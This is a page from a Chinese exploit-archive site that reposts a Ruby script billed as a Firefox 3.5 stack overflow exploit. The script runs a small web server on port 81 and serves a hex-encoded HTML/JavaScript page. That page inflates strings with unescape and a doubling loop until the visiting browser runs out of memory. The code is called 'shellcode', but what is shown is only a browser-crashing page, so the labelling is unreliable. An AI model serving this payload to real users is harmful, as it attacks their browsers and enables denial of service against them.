首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Firefox 3.5 Stack Overflow Exploit
来源:vfocus.net 作者:Whivack 发布时间:2010-03-31  
==================================
Firefox 3.5 Stack Overflow Exploit
==================================

#!bin/ruby

#########################################################
# Exploit : Shellcode Stack Overflow Firefox 3.5
# Date : 23/03/2010
# Author : Whivack Gsk?
# Software Link : http://www.mozilla-europe.org/fr/firefox/3.5/releasenotes/
# Version : 3.5
# Tested On : XP/Vista & Ubuntu
# Fonction : Connect Firefox Browser http://127.0.0.1:81/
##########################################################

require 'socket'

shellcode =
"\x3C\x68\x74\x6D\x6C\x3E" +
"\x3C\x68\x65\x61\x64\x3E" +
"\x3C\x73\x63\x72\x69\x70\x74\x3E" +
"\x76\x61\x72\x20\x73\x20\x3D\x20\x75\x6E\x65\x73\x63\x61\x70\x65\x28\x22\x25\x75\x34\x31\x34\x31\x25\x75\x34\x31\x34\x31\x22\x29\x3B\x20" +
"\x76\x61\x72\x20\x73\x74\x20\x3D\x20\x75\x6E\x65\x73\x63\x61\x70\x65\x28\x22\x25\x75\x30\x30\x30\x30\x25\x75\x30\x30\x30\x30\x22\x29\x3B\x20" +
"\x76\x61\x72\x20\x66\x32\x20\x3D\x20\x6D\x75\x6C\x38\x28\x73\x74\x2C\x20\x34\x39\x30\x30\x30\x30\x30\x30\x29\x3B\x20" +
"\x76\x61\x72\x20\x66\x20\x3D\x20\x6D\x75\x6C\x38\x28\x73\x2C\x20\x32\x31\x30\x30\x30\x30\x30\x30\x29\x3B\x20" +
"\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x66\x32\x29\x3B\x20" +
"\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x66\x29\x3B\x20" +
"\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x6D\x75\x6C\x38\x28\x73\x2C\x20\x6E\x75\x6D\x29\x20\x7B\x20" +
"\x76\x61\x72\x20\x69\x20\x3D\x20\x4D\x61\x74\x68\x2E\x63\x65\x69\x6C\x28\x4D\x61\x74\x68\x2E\x6C\x6F\x67\x28\x6E\x75\x6D\x29\x20\x2F\x20\x4D\x61\x74\x68\x2E\x4C\x4E\x32\x29\x2C\x20" +
"\x72\x65\x73\x20\x3D\x20\x73\x3B" +
"\x64\x6F\x20\x7B" +
"\x72\x65\x73\x20\x2B\x3D\x72\x65\x73\x3B" +
"\x7D\x20\x77\x68\x69\x6C\x65\x20\x28\x30\x20\x3C\x20\x2D\x2D\x69\x29\x3B" +
"\x72\x65\x74\x75\x72\x6E\x20\x72\x65\x73\x2E\x73\x6C\x69\x63\x65\x28\x30\x2C\x20\x73\x2E\x6C\x65\x6E\x67\x74\x68\x20\x2A\x6E\x75\x6D\x29\x3B" +
"\x7D" +
"\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E" +
"\x3C\x2F\x68\x65\x61\x64\x3E" +
"\x3C\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x68\x74\x6D\x6C\x3E" +
"\x3C\x68\x74\x6D\x6C\x3E" +
"\x3C\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x62\x6F\x64\x79\x3E" +
"\x3C\x2F\x68\x74\x6D\x6C\x3E"

serveur = TCPServer.new( 81 )
client = nil
while ( ( client = serveur.accept ) )
requete = client.gets
client.puts( "HTTP/1.0 200 OK" )
client.puts( "Content-Type:text/html" )
client.puts
client.puts "#{shellcode}"

client.close
end



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Jira Atlassian File Attachment
·xwine v1.0.1 (.exe file) Local
·Proxomitron 4.5 DOS attack
·ASX to MP3 Converter Version 3
·Peazip 3.0 DOS attack
·Stud_PE <= v2.6.05 Stack Overf
·RM Downloader 3.0.2.1 (.asx) L
·Mini-stream Ripper 3.1.0.8 =>
·All to All Audio Convertor v2.
·JITed egg-hunter stage-0 shell
·Shadow Stream Recorder 3.0.1.7
·Mini-stream RM-MP3 Converter V
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved